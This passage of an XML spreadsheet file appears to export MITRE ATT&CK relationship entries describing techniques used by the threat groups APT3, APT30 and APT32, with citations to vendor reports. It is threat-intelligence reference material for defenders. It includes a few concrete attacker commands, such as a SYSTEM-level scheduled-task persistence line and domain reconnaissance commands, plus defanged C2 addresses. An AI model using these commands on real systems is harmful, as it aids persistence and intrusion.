    <t>[APT3](https://attack.mitre.org/groups/G0022) will identify Microsoft Office documents on the victim's computer.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--8f6701a2-91cc-449e-98e1-e83bd2f7317c</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) leverages valid accounts after gaining credentials for use within the victim domain.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--8ac07a3f-9468-47a3-8ecc-c432f80e03f4</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that exfiltrates data over the C2 channel.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--68edf451-bda3-4159-9715-dbcfda8eb8e2</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--924c8549-a033-44f9-8823-64e95fe339e7</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader establishes SOCKS5 connections for its initial C2.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--4f76fd4d-a638-41a0-90b9-bd4ada6f93f3</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can delete files.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--9b7bf5d9-23a0-4190-80c0-b27b906bafcc</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that looks for files and directories on the local file system.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>relationship--a8b248fe-a27c-40fd-83d5-f4382035d656</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to use &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--1c1296da-4504-4f00-b16a-8ecc29820ea9</t>
  </si>
  <si>
    <t>07 October 2019</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to remove indicators of compromise from tools.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>relationship--febbf503-d7e5-4896-90b9-35b6a811b19b</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can copy files to remote machines.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--f661bda3-d524-44b3-aeb0-d8dd8879a569</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a keylogging tool that records keystrokes in encrypted files.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--ed283e07-a029-4d23-aa8f-55f92abb5203</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument "dig."(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--c948f964-e26c-4226-9577-7b78b5bf271f</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a tool that can obtain info about local and global group users, power users, and administrators.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--9a615c7f-986d-4769-bea6-af9ffe0d575e</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to create or enable accounts, such as &lt;code&gt;support_388945a0&lt;/code&gt;.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--f0b3c919-bf39-4bc9-9488-5f30d5407c54</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to stage files for exfiltration in a single location.(Citation: aptsim)</t>
  </si>
  <si>
    <t>relationship--87ddc052-0933-4722-9fb2-4653c4a3663c</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has lured victims into clicking malicious links delivered through spearphishing.(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>relationship--67e3c192-f0f3-4b8d-9fd7-b4200acebd85</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--1258536b-6cf4-4cfe-98c7-e9c1d30c5a34</t>
  </si>
  <si>
    <t>relationship--df4b49f1-71ca-4744-8554-47bf36174d89</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) obfuscates files or information to help evade defensive measures.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--56c927c5-f64e-4b31-9a14-7ce78fd1c8a1</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to brute force password hashes to be able to leverage plain text credentials.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>relationship--1334cbe3-8613-4279-9a1f-58781c2656a4</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate the permissions associated with Windows groups.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--e590aaaa-40fd-4f61-93f3-f2d6daee65a4</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used PowerShell on victim systems to download and run payloads after exploitation.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--ba1b953d-08ce-4b4b-924e-92556cdf1d90</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can list out currently running processes.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>relationship--daf56e8e-ea82-4ef2-bb03-78dd7e6ef3c0</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) places scripts in the startup folder for persistence.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--cc705bf0-ba29-443e-9cd5-aef247505210</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</si>
  <si>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</si>
  <si>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relationship--d2858dfa-504f-416d-8801-41a1a9561f22</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can detect the existence of remote systems.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--e7714693-e792-44f0-a224-9899df75fced</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can run DLLs.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>relationship--555e47f2-54bb-4c97-8804-536aa354126c</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--96797ece-5783-4d34-a399-32496c8705ac</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader creates persistence by creating the following scheduled task: &lt;code&gt;schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"&lt;/code&gt;.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--0ca1948b-476c-4ff5-a792-f3790250bdc1</t>
  </si>
  <si>
    <t xml:space="preserve">[APT3](https://attack.mitre.org/groups/G0022) has been known to pack their tools.(Citation: APT3 Adversary Emulation Plan)(Citation: FireEye Clandestine Wolf) </t>
  </si>
  <si>
    <t>relationship--ef1cdbe7-29c9-4be9-a3f7-96e5b7bae031</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has sent spearphishing emails containing malicious links.(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>relationship--598e9cc3-818c-4fc0-baf3-aba229543da5</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can obtain information about the local system.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>relationship--b0791504-fc65-402b-bc47-bd96ed4abea1</t>
  </si>
  <si>
    <t>A keylogging tool used by [APT3](https://attack.mitre.org/groups/G0022) gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>relationship--48042284-2fde-43f0-a3dc-f64e9f16bd77</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate current network connections.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>relationship--4d82bac6-ec9d-4f4b-a471-169728a830a4</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt; to verify that it is running with the elevated privileges of “System.”(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--fcfb3ce0-01a0-4f92-8e18-b323202d095d</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt;. The group also uses a tool to execute commands on remote computers.(Citation: FireEye Operation Double Tap)(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--41d61146-4a42-4897-b4a1-a706130a322d</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that creates a new service for persistence.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--bc9cfe76-2d64-4901-8e9e-c69d046cdfaa</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--bfc4c5dd-a02a-42a0-8838-1e9b45c1dd7e</t>
  </si>
  <si>
    <t>21 July 2020</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) has used spearphishing emails with malicious DOC attachments.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--862470eb-b43a-42d9-ab06-4ca6fbc3671d</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used LZMA compression and RC4 encryption before exfiltration.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--7723037f-0b2e-447b-811a-d18a109570bb</t>
  </si>
  <si>
    <t>01 April 2019</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--d57fba3a-0ed8-49a1-9446-13a4b73c3bc5</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has cleared select event log entries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--885cd1fe-9e7b-4e94-a6cc-01bb8ad655fd</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--4683801a-abe8-4db2-88b9-ebbd2073bfeb</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used COM scriptlets to download Cobalt Strike beacons.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--768a6678-4823-4af5-bfd9-1a92c562b9f2</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--304f5c1b-7cfa-4c2a-b7a2-e4957da603b1</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</si>
  <si>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</si>
  <si>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relationship--4f13e788-b0da-457d-89b1-64196c9627b8</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up and operated websites to gather information and deliver malware.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--45407caa-cfee-426d-a928-04db128b7ce8</t>
  </si>
  <si>
    <t>24 November 2020</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has infected victims by tricking them into visiting compromised watering hole websites.(Citation: ESET OceanLotus)(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--72f9bf47-61ac-42c8-acbf-65be7c25af0f</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</si>
  <si>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</si>
  <si>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relationship--6c4a3ef5-8aee-4fe8-b2c6-386f90c057a4</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has collected e-mail addresses for activists and bloggers in order to target them with spyware.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--dcb3ae1c-c1a5-4a28-b206-40f8387804ac</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has exfiltrated data using the already opened channel with its C&amp;C server.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--6dc0069c-5e6a-474f-946d-cc1cd13bc486</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--46fa464b-20e0-4c77-9b75-580f9f236c43</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--e2048373-fe76-4f99-8608-60eaa05d1b2b</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used CVE-2016-7255 to escalate privileges.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--e0033e57-8839-42b9-8515-46e9c7dca966</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor can receive a “delete” command.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>relationship--8029cccc-e198-4326-ac27-67b5968007ee</t>
  </si>
  <si>
    <t>15 April 2019</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050)'s backdoor possesses the capability to list files and directories on a machine. (Citation: ESET OceanLotus Mar 2019)	
</t>
  </si>
  <si>
    <t>relationship--a933bad9-0f92-4a25-9b46-19120737caee</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has stored its configuration in a registry key.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--8cc515c2-01b6-4cd7-a928-1131ffe5f11c</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has conducted targeted surveillance against activists and bloggers.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--7133e850-c3f2-48c2-b610-22e3501354df</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor hides the clientID file via a chflags function.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>relationship--c7bb75c5-c678-4ea7-b9ed-0c12c5de3077</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: FireEye APT32 May 2017) (Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--db8530c2-ce41-4943-8a17-91502187fd06</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>relationship--93f1726f-f172-4705-a13a-d5adaeb4e91b</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--18771b0e-2d4b-4f76-ae1e-9cdac1c77cd0</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--dc8bedf8-c6fe-4b99-bde0-db676ba35a91</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--63835d80-f52b-472c-a605-b0360eea3539</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has deployed tools after moving laterally using administrative accounts.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--1ecf4ac9-faad-4d2d-9a01-2618a7a54806</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor changes the permission of the file it wants to execute to 755.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>relationship--a4409632-996c-4f20-bdb0-a8e92c98307f</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users using the commands &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--5d45479d-7cc2-49cc-8f10-5ead0a1db033</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used legitimate local admin account credentials.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--70bc1a16-3c57-4198-b2f9-c7f27bec271c</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used email for C2 via an Office macro.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--76ec3407-84df-4bc9-8679-09564ca9329e</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</si>
  <si>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</si>
  <si>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relationship--ea7c1a9f-7d8e-4a06-8331-9901a33ee7d8</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</si>
  <si>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</si>
  <si>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relationship--788a6ca2-60ac-4f36-b708-c3a57f087b2b</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</si>
  <si>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</si>
  <si>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relationship--6f0b6cfd-ebe2-46f3-9be1-0075237dbcb9</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has disguised a Cobalt Strike beacon as a Flash Installer.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--0d7c99f4-b1af-4278-b8bf-3bb04cce166d</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</si>
  <si>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</si>
  <si>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relationship--7e7d5aa9-6860-44fe-88b9-22a6b36162e2</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has modified the Windows Registry to store the backdoor's configuration. (Citation: ESET OceanLotus Mar 2019)	</t>
  </si>
  <si>
    <t>relationship--76d2d007-1adb-4e04-8e79-dbd799ff57ef</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--a7f5320a-dd76-4fa0-998f-44860ff1b307</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--1eeb08cb-8b06-45a7-bf74-fb8bdaa4b02f</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--63994c7c-6544-4e29-9c94-ac2237166774</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;net view&lt;/code&gt; command to show all shares available, including the administrative shares such as &lt;code&gt;C$&lt;/code&gt; and &lt;code&gt;ADMIN$&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--3c3f5cdb-f2cd-4bab-8196-26f160b38a5e</t>
  </si>
  <si>
    <t>An [APT32](https://attack.mitre.org/groups/G0050) backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--4050ee68-3f26-49e6-beec-e2a62133a1c3</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used GetPassword_x64 to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--6f75cf7f-1c21-4c22-983b-fac20ea85101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</si>
  <si>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</si>
  <si>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relationship--db91e39d-daa4-4f9c-a7a6-be67eba712d2</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--e1f7179b-37ac-4f47-8368-0f55814a6447</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used pass the hash for lateral movement.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--0743264d-1356-4f9e-96cc-8698f5e0e862</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) successfully gained remote access by using pass the ticket.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--c08684c8-8467-4b7f-a9ac-3330cf423261</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--5f00edf9-fcfc-4514-8d06-bc69f91f9260</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) malware has injected a Cobalt Strike beacon into Rundll32.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--36af6d80-fef4-40b9-9b32-a2947eadd9e7</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)</t>
  </si>
  <si>
    <t>relationship--36f3f6df-5007-4075-84a3-9708132f1468</t>
  </si>
  <si>
    <t>06 February 2020</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can query the Windows Registry to gather system information. (Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--46144407-0f14-4358-8d4e-23b3ef13cb4e</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</si>
  <si>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</si>
  <si>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relationship--f4a0f496-b47c-4bdf-affb-b57fb17203db</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</si>
  <si>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</si>
  <si>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relationship--dfcc52d8-4664-48c4-9e35-2be2cd649d93</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has enumerated DC servers using the command &lt;code&gt;net group "Domain Controllers" /domain&lt;/code&gt;. The group has also used the &lt;code&gt;ping&lt;/code&gt; command.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--a6080757-7935-439b-b70f-72ba841cda03</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has moved and renamed pubprn.vbs to a .txt file to avoid detection.(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade)</t>
  </si>
  <si>
    <t>relationship--9932d0d8-ad06-4a4f-8acf-1502c2b5f009</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--749fb1ed-d73c-4317-8c0f-6c059cff094f</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used [Net](https://attack.mitre.org/software/S0039) to use Windows' hidden network shares to copy their tools to remote machines for execution.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--bfdffc50-dba0-41d1-a332-0a02a0a8de07</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used scheduled tasks to persist on victim systems.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--98908617-068d-4b6e-bcba-ad213c137b1e</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used Windows services as a way to execute its malicious payload. (Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>relationship--a491cb90-9480-450b-9a57-55b95b249d31</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up Facebook pages in tandem with fake websites.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--e122b9fa-d722-4ee8-a5d7-0e585277676d</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) compromised McAfee ePO to move laterally by distributing malware as a software deployment task.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--1d3654f8-3a5e-4ef8-826f-4242ecf78c0a</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</si>
  <si>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</si>
  <si>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relationship--3a8d8063-3f4d-420d-8c72-2b99077aa487</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</si>
  <si>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</si>
  <si>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relationship--5758382a-2ada-4d05-ad25-8ee802a9e041</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used malicious links to direct users to web pages designed to harvest credentials.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--5bc091f3-0059-4eab-ab68-5e4474108fdf</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</si>
  <si>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</si>
  <si>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relationship--43809fa9-dbe2-4429-875e-f0828563d6aa</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--cbc1d2d8-aac7-498a-a034-f0a672977c11</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;netstat -anpo tcp&lt;/code&gt; command to display TCP connections on the victim's machine.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--db852d3d-7f78-43b9-bd14-3f2d11c22863</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</si>
  <si>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</si>
  <si>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relationship--40032198-f003-4171-92a0-faf038f62a0b</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</si>
  <si>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</si>
  <si>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relationship--71a8ae5e-3a78-49b5-9857-e202d636cedf</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</si>
  <si>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</si>
  <si>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relationship--bfa11036-022f-49b3-a6bd-7cf2083a264e</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--9ed7e90a-8034-48eb-8444-9ec29941a7b8</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used macros, COM scriptlets, and VBS scripts.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017) </t>
  </si>
  <si>
    <t>relationship--b019ea9e-afc4-4015-b690-677a09178feb</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</si>
  <si>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</si>
  <si>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relationship--79057890-3cd0-4124-8b35-b86db6b4f9d7</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--fdf8d947-f896-4797-9c6f-00b211a602a6</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>relationship--c16c1ef2-2356-4987-bd9e-2cdaa007281a</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used Web shells to maintain access to victim websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>relationship--c7017855-dc52-4e9d-977f-3af701e094c8</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used cmd.exe for execution.(Citation: Cybereason Cobalt Kitty 2017) </t>
  </si>
  <si>
    <t>relationship--46e6fd22-1f0b-452c-bcf3-c24fe5911fd4</t>
  </si>
  <si>
